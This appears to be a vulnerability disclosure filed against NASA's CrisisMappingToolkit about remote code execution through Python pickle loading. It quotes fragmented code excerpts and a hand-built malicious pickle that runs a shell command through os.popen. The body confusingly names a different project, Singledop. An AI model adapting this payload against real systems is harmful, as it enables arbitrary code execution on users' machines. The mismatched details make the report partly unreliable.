nasa
Remote code execution in CrisisMappingToolkit
Hi, CrisisMappingToolkit
CrisisMappingToolkit/cmt/mapclient_qt.py
# Load the pickle formatted data with open(path, 'rb') as f: (pickle_images, TileManager._lru_keys) = pickle.load(f) # Unpack images one at a time TileManager._images = {} for (pImage, key) in zip(pickle_images, TileM
or fname in flist: 14 with open(fname) as f: 15 t = cPickle.load(f) 16 xco2_a = t["XCO2_a"] … 23 with open("my_cov.pkl") as f: 24 dist_cov = cPickle.load(f) 25
I would like to report a remote code execution potential vulnerability in Singledop. Pickle module enables binary serialization and loading of Python datatypes and any user supplied sample file can lead to remote code execution on any researches machine processing a serialized file.
Attack binary a valid dop file:
mona@mona-virtual-machine:~/Downloads/SingleDop$ cat t_file cos popen (S'uname -a' tRp100 0c__builtin__ getattr (c__builtin__ file S'read' tRp101 0c__builtin__ apply (g101 (g100 I1000 ltRp102 0c__builtin__ getattr (c__builtin__ file S'close' tRp103 0c__builtin__ apply (g103 (g100 ltRp104 0g102 .
The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Please let me know if you have any questions. You can also reach back to me at [email protected] Thanks
